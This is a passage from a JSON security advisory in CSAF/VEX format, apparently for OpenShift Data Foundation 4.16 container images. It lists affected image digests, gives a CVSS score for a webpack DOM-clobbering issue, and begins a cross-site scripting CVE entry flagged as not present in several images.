"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
